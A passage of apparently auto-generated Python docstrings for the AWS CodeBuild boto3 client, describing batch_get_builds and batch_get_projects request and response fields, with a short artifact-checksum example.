- **subnets** *(list) --*
A list of one or more subnet IDs in your Amazon VPC.
- *(string) --*
- **securityGroupIds** *(list) --*
A list of one or more security group IDs in your Amazon VPC.
- *(string) --*
- **networkInterface** *(dict) --*
Describes a network interface.
- **subnetId** *(string) --*
The ID of the subnet.
- **networkInterfaceId** *(string) --*
The ID of the network interface.
- **encryptionKey** *(string) --*
The AWS Key Management Service (AWS KMS) customer master key (CMK) to be used for encrypting the build output artifacts.
.. note::
You can use a cross-account KMS key to encrypt the build output artifacts if your service role has permission to that key.
You can specify either the Amazon Resource Name (ARN) of the CMK or, if available, the CMK's alias (using the format ``alias/*alias-name* `` ).
- **buildsNotFound** *(list) --*
The IDs of builds for which information could not be found.
- *(string) --*
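**Examples**
A minimal usage sketch, not part of the official API reference: it fetches build details and checks a ZIP artifact's SHA-256 hash against a local copy. The build ID and the local file path are hypothetical placeholders.
::
    import hashlib
    import boto3

    client = boto3.client('codebuild')
    # Hypothetical build ID; real IDs come from list_builds or list_builds_for_project.
    response = client.batch_get_builds(ids=['my-project:example-build-id'])
    for build in response['builds']:
        expected = build.get('artifacts', {}).get('sha256sum')  # set only when packaging is ZIP
        if expected:
            # 'artifact.zip' is a hypothetical local copy of the S3 build artifact.
            with open('artifact.zip', 'rb') as f:
                actual = hashlib.sha256(f.read()).hexdigest()
            print('integrity verified' if actual == expected else 'checksum mismatch')
    for build_id in response['buildsNotFound']:
        print('build not found:', build_id)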
:type ids: list
:param ids: **[REQUIRED]**
The IDs of the builds.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def batch_get_projects(self, names: List) -> Dict:
"""
Gets information about build projects.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/BatchGetProjects>`_
**Request Syntax**
::
response = client.batch_get_projects(
names=[
'string',
]
)
**Response Syntax**
::
{
'projects': [
{
'name': 'string',
'arn': 'string',
'description': 'string',
'source': {
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
'secondarySources': [
{
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
'artifacts': {
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
'secondaryArtifacts': [
{
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
'cache': {
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
'environment': {
'type': 'WINDOWS_CONTAINER'|'LINUX_CONTAINER',
'image': 'string',
'computeType': 'BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
'environmentVariables': [
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
'privilegedMode': True|False,
'certificate': 'string',
'registryCredential': {
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
'imagePullCredentialsType': 'CODEBUILD'|'SERVICE_ROLE'
},
'serviceRole': 'string',
'timeoutInMinutes': 123,
'queuedTimeoutInMinutes': 123,
'encryptionKey': 'string',
'tags': [
{
'key': 'string',
'value': 'string'
},
],
'created': datetime(2015, 1, 1),
'lastModified': datetime(2015, 1, 1),
'webhook': {
'url': 'string',
'payloadUrl': 'string',
'secret': 'string',
'branchFilter': 'string',
'filterGroups': [
[
{
'type': 'EVENT'|'BASE_REF'|'HEAD_REF'|'ACTOR_ACCOUNT_ID'|'FILE_PATH',
'pattern': 'string',
'excludeMatchedPattern': True|False
},
],
],
'lastModifiedSecret': datetime(2015, 1, 1)
},
'vpcConfig': {
'vpcId': 'string',
'subnets': [
'string',
],
'securityGroupIds': [
'string',
]
},
'badge': {
'badgeEnabled': True|False,
'badgeRequestUrl': 'string'
},
'logsConfig': {
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
}
},
],
'projectsNotFound': [
'string',
]
}
**Response Structure**
- *(dict) --*
- **projects** *(list) --*
Information about the requested build projects.
- *(dict) --*
Information about a build project.
- **name** *(string) --*
The name of the build project.
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the build project.
- **description** *(string) --*
A description that makes the build project easy to identify.
- **source** *(dict) --*
Information about the build input source code for this build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySources** *(list) --*
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **artifacts** *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --*
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash ("/"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to "``/`` ", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to "``/`` ", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **secondaryArtifacts** *(list) --*
An array of ``ProjectArtifacts`` objects.
- *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --*
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash ("/"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to "``/`` ", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to "``/`` ", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **cache** *(dict) --*
Information about the cache for the build project.
- **type** *(string) --*
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads and writes from and to S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux environment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to either of the other two local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overridden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
- **environment** *(dict) --*
Information about the build environment for this build project.
- **type** *(string) --*
The type of build environment to use for related builds.
- **image** *(string) --*
The image tag or image digest that identifies the Docker image to use for this build project. Use the following formats:
* For an image tag: ``registry/repository:tag`` . For example, to specify an image with the tag "latest," use ``registry/repository:latest`` .
* For an image digest: ``registry/repository@digest`` . For example, to specify an image with the digest "sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf," use ``registry/repository@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf`` .
- **computeType** *(string) --*
Information about the compute resources the build project uses. Available values include:
* ``BUILD_GENERAL1_SMALL`` : Use up to 3 GB memory and 2 vCPUs for builds.
* ``BUILD_GENERAL1_MEDIUM`` : Use up to 7 GB memory and 4 vCPUs for builds.
* ``BUILD_GENERAL1_LARGE`` : Use up to 15 GB memory and 8 vCPUs for builds.
- **environmentVariables** *(list) --*
A set of environment variables to make available to builds for this build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --*
The name or key of the environment variable.
- **value** *(string) --*
The value of the environment variable.
.. warning::
We strongly discourage the use of environment variables to store sensitive values, especially AWS secret key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
- **privilegedMode** *(boolean) --*
Enables running the Docker daemon inside a Docker container. Set to true only if the build project is used to build Docker images, and the specified build environment image is not provided by AWS CodeBuild with Docker support. Otherwise, all associated builds that attempt to interact with the Docker daemon fail. You must also start the Docker daemon so that builds can interact with it. One way to do this is to initialize the Docker daemon during the install phase of your build spec by running the following build commands. (Do not run these commands if the specified build environment image is provided by AWS CodeBuild with Docker support.)
If the operating system's base image is Ubuntu Linux:
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 sh -c "until docker info; do echo .; sleep 1; done"``
If the operating system's base image is Alpine Linux, add the ``-t`` argument to ``timeout`` :
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout -t 15 sh -c "until docker info; do echo .; sleep 1; done"``
- **certificate** *(string) --*
The certificate to use with this build project.
- **registryCredential** *(dict) --*
The credentials for access to a private registry.
- **credential** *(string) --*
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
- **credentialProvider** *(string) --*
The service that created the credentials to access a private Docker registry. The valid value, SECRETS_MANAGER, is for AWS Secrets Manager.
- **imagePullCredentialsType** *(string) --*
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild's service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project's service role.
When you use a cross-account or private registry image, you must use SERVICE_ROLE credentials. When you use an AWS CodeBuild curated image, you must use CODEBUILD credentials.
- **serviceRole** *(string) --*
The ARN of the AWS Identity and Access Management (IAM) role that enables AWS CodeBuild to interact with dependent AWS services on behalf of the AWS account.
- **timeoutInMinutes** *(integer) --*
How long, in minutes, from 5 to 480 (8 hours), for AWS CodeBuild to wait before timing out any related build that did not get marked as completed. The default is 60 minutes.
- **queuedTimeoutInMinutes** *(integer) --*
The number of minutes a build is allowed to be queued before it times out.
- **encryptionKey** *(string) --*
The AWS Key Management Service (AWS KMS) customer master key (CMK) to be used for encrypting the build output artifacts.
.. note::
You can use a cross-account KMS key to encrypt the build output artifacts if your service role has permission to that key.
You can specify either the Amazon Resource Name (ARN) of the CMK or, if available, the CMK's alias (using the format ``alias/*alias-name* `` ).
- **tags** *(list) --*
The tags for this build project.
These tags are available for use by AWS services that support AWS CodeBuild build project tags.
- *(dict) --*
A tag, consisting of a key and a value.
This tag is available for use by AWS services that support tags in AWS CodeBuild.
- **key** *(string) --*
The tag's key.
- **value** *(string) --*
The tag's value.
- **created** *(datetime) --*
When the build project was created, expressed in Unix time format.
- **lastModified** *(datetime) --*
When the build project's settings were last modified, expressed in Unix time format.
- **webhook** *(dict) --*
Information about a webhook that connects repository events to a build project in AWS CodeBuild.
- **url** *(string) --*
The URL to the webhook.
- **payloadUrl** *(string) --*
The AWS CodeBuild endpoint where webhook events are sent.
- **secret** *(string) --*
The secret token of the associated repository.
.. note::
A Bitbucket webhook does not support ``secret`` .
- **branchFilter** *(string) --*
A regular expression used to determine which repository branches are built when a webhook is triggered. If the name of a branch matches the regular expression, then it is built. If ``branchFilter`` is empty, then all branches are built.
.. note::
It is recommended that you use ``filterGroups`` instead of ``branchFilter`` .
- **filterGroups** *(list) --*
An array of arrays of ``WebhookFilter`` objects used to determine which webhooks are triggered. At least one ``WebhookFilter`` in the array must specify ``EVENT`` as its ``type`` .
For a build to be triggered, at least one filter group in the ``filterGroups`` array must pass. For a filter group to pass, each of its filters must pass.
- *(list) --*
- *(dict) --*
A filter used to determine which webhooks trigger a build.
- **type** *(string) --*
The type of webhook filter. There are five webhook filter types: ``EVENT`` , ``ACTOR_ACCOUNT_ID`` , ``HEAD_REF`` , ``BASE_REF`` , and ``FILE_PATH`` .
EVENT
A webhook event triggers a build when the provided ``pattern`` matches one of four event types: ``PUSH`` , ``PULL_REQUEST_CREATED`` , ``PULL_REQUEST_UPDATED`` , and ``PULL_REQUEST_REOPENED`` . The ``EVENT`` patterns are specified as a comma-separated string. For example, ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` filters all push, pull request created, and pull request updated events.
.. note::
The ``PULL_REQUEST_REOPENED`` event type works with GitHub and GitHub Enterprise only.
ACTOR_ACCOUNT_ID
A webhook event triggers a build when a GitHub, GitHub Enterprise, or Bitbucket account ID matches the regular expression ``pattern`` .
HEAD_REF
A webhook event triggers a build when the head reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` and ``refs/tags/tag-name`` .
Works with GitHub and GitHub Enterprise push, GitHub and GitHub Enterprise pull request, Bitbucket push, and Bitbucket pull request events.
BASE_REF
A webhook event triggers a build when the base reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` .
.. note::
Works with pull request events only.
FILE_PATH
A webhook triggers a build when the path of a changed file matches the regular expression ``pattern`` .
.. note::
Works with GitHub and GitHub Enterprise push events only.
- **pattern** *(string) --*
For a ``WebHookFilter`` that uses ``EVENT`` type, a comma-separated string that specifies one or more events. For example, the webhook filter ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` allows all push, pull request created, and pull request updated events to trigger a build.
For a ``WebHookFilter`` that uses any of the other filter types, a regular expression pattern. For example, a ``WebHookFilter`` that uses ``HEAD_REF`` for its ``type`` and the pattern ``^refs/heads/`` triggers a build when the head reference is a branch with a reference name ``refs/heads/branch-name`` .
- **excludeMatchedPattern** *(boolean) --*
Used to indicate that the ``pattern`` determines which webhook events do not trigger a build. If true, then a webhook event that does not match the ``pattern`` triggers a build. If false, then a webhook event that matches the ``pattern`` triggers a build.
- **lastModifiedSecret** *(datetime) --*
A timestamp that indicates the last time a repository's secret token was modified.
- **vpcConfig** *(dict) --*
Information about the VPC configuration that AWS CodeBuild accesses.
- **vpcId** *(string) --*
The ID of the Amazon VPC.
- **subnets** *(list) --*
A list of one or more subnet IDs in your Amazon VPC.
- *(string) --*
- **securityGroupIds** *(list) --*
A list of one or more security group IDs in your Amazon VPC.
- *(string) --*
- **badge** *(dict) --*
Information about the build badge for the build project.
- **badgeEnabled** *(boolean) --*
Set this to true to generate a publicly accessible URL for your project's build badge.
- **badgeRequestUrl** *(string) --*
The publicly accessible URL through which you can access the build badge for your project.
